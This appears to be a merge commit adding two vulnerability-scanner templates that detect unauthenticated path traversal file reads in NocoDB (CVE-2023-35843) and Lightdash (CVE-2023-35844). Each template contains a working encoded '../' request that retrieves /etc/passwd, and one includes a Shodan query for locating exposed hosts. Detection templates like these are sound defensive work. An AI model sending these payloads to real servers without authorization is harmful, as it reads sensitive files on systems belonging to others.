Merge pull request #7491 from dwisiswant0/add/DW1-59-60

add(http/cves): CVE-2023-35843 & CVE-2023-35844
2023-06-22 10:19:51 +05:30 · 2023-06-22 10:19:51 +05:30 · 5266fee162
parent 4eb5b9c6bd 0be3f0be0e
commit 5266fee162
2 changed files with 67 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-35843.yaml
+++ b/http/cves/2023/CVE-2023-35843.yaml
@ -0,0 +1,34 @@
+id: CVE-2023-35843
+
+info:
+  name: NocoDB version <= 0.106.1 Arbitrary File Read
+  author: dwisiswant0
+  severity: high
+  description: |
+    NocoDB through 0.106.1 has a path traversal vulnerability
+    that allows an unauthenticated attacker to access arbitrary files on
+    the server by manipulating the path parameter of the /download route.
+    This vulnerability could allow an attacker to access sensitive files
+    and data on the server, including configuration files, source code,
+    and other sensitive information.
+  reference:
+    - https://advisory.dw1.io/60
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-35843
+  metadata:
+    verified: true
+  tags: cve,cve2023,nocodb,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/download/{{repeat('..%2F', 5)}}etc%2Fpasswd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
--- a/http/cves/2023/CVE-2023-35844.yaml
+++ b/http/cves/2023/CVE-2023-35844.yaml
@ -0,0 +1,33 @@
+id: CVE-2023-35844
+
+info:
+  name: Lightdash version <= 0.510.3 Arbitrary File Read
+  author: dwisiswant0
+  severity: high
+  description: |
+    packages/backend/src/routers in Lightdash before 0.510.3
+    has insecure file endpoints, e.g., they allow .. directory
+    traversal and do not ensure that an intended file extension
+    (.csv or .png) is used.
+  reference:
+    - https://advisory.dw1.io/59
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-35844
+  metadata:
+    verified: true
+    shodan-query: title:"Lightdash"
+  tags: cve,cve2023,lightdash,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/v1/slack/image/slack-image{{repeat('%2F..', 3)}}%2Fetc%2Fpasswd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200